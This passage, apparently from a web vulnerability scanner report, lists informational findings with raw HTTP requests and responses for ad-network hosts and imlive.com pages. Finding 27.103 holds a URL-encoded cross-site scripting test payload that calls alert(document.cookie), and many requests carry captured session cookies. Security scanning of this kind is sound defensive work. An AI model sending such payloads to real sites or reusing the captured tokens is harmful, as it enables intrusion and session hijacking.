fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:03 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:03 GMT
Cache-Control: max-age=86400
Content-Length: 5749

<html>
<head><title>theaters near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/queensbury-ny/venues/show/42768-regal-aviation-mall-7'>Regal Aviation Mall 7 in
...[SNIP]...

27.95. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:44:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico not found</pre>
<BR>

27.96. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Request

GET /ptj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acb266870=; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; icu=EAAYAA..; acb781784=; acb502322=; acb437727=; acb217792=; uuid2=4760492999213801733; acb810948=; acb458625=; acb64287=; acb322141=; acb119885=; acb780011=; acb120773=; acb510504=; sess=1; acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; acb402178=;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 04:49:47 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.97. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Request

GET /ttj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acb266870=; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; icu=EAAYAA..; acb781784=; acb502322=; acb437727=; acb217792=; uuid2=4760492999213801733; acb810948=; acb458625=; acb64287=; acb322141=; acb119885=; acb780011=; acb120773=; acb510504=; sess=1; acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; acb402178=;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 04:49:50 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

27.98. http://imlive.com/categoryfs.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:17 GMT
Connection: close
Content-Length: 18918
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...

27.99. http://imlive.com/categoryms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 21809
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...

27.100. http://imlive.com/compliance.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /compliance.asp

Request

GET /compliance.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:42 GMT
Connection: close
Content-Length: 1925
Vary: Accept-Encoding

<html>
<head>
<title>Compliance - Live Video Chat at ImLive</title>
<meta name="description" content="Our live video chat hosts are at least 18 years old. ImLive complies with 18 U.S.C. &sect;&nbsp
...[SNIP]...

27.101. http://imlive.com/disclaimer.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /disclaimer.asp

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:24 GMT
Connection: close
Content-Length: 78840
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...

27.102. http://imlive.com/homepagems3.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 13:59:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10201


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...

27.103. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Request

GET /homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.2.10.1296223202; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:05:46 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8407


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

27.104. http://imlive.com/liveexperts.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /liveexperts.asp

Request

GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 19369
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...

27.105. http://imlive.com/localcompanionship.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /localcompanionship.asp

Request

GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:20 GMT
Connection: close
Content-Length: 16528
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...

27.106. http://imlive.com/minglesingles.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /minglesingles.asp

Request

GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:19 GMT
Connection: close
Content-Length: 16092
Vary: Accept-Encoding


<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...

27.107. http://imlive.com/pr.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /pr.asp

Request

GET /pr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:27 GMT
Connection: close
Content-Length: 9835
